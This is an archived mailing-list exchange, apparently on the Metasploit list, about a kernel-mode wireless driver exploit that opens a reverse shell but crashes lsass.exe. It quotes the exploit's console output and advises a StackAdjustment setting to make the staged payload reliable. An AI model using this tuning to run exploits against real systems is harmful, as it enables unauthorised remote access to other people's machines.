Mistake in kernel mode payloads

[mmiller at hick.org (Matt Miller)]

On Tue, Mar 11, 2008 at 08:43:41PM +0100, Giuseppe Gottardi wrote:
> On Wed, Feb 27, 2008 at 1:34 AM,  <mmiller at hick.org> wrote:
> >  What is EXITFUNC set to when you run your exploit?  In general, the
> >  stager assumes that the user-mode payload will take care of cleanup.
> >  Currently, this typically involves a call to ExitProcess, ExitThread, or
> >  generating an exception (depending on EXITFUNC).  If your EXITFUNC is
> >  set to seh this will likely cause lsass to crash in the manner that
> >  you're seeing.
>
> msf exploit(intel_2200BG_probe) > rexploit
> [*] Started reverse handler
> [*] Sending probe exploit to 00:0e:35:95:7b:45...
> [-] 
> #################################################################################################################[*]
> Sending stage (474
> bytes)
> [*] Command shell session 2 opened (192.168.33.212:4444 -> 192.168.33.159:1085)
> #
> [*] Completed sending probe.
>
> (lsass.exe die)

The most likely reason for this has to do with available stack space for
the stager.  Try setting 'StackAdjustment' => -3500 in your 'Payload'
information hash (take a look at windows/smb/ms06_040_netapi for an
example).  In general, if you use a staged payload and receive a
connection but the process crashes, it may be indicative of the stager
attempting to read more data than is available on the stack (leading to
the call to recv failing and the process crashing).  We have thought
about making StackAdjustment default for Windows exploits and may do
that in the future.  The other wifi driver exploits most likely need to
have this added as well for reliability.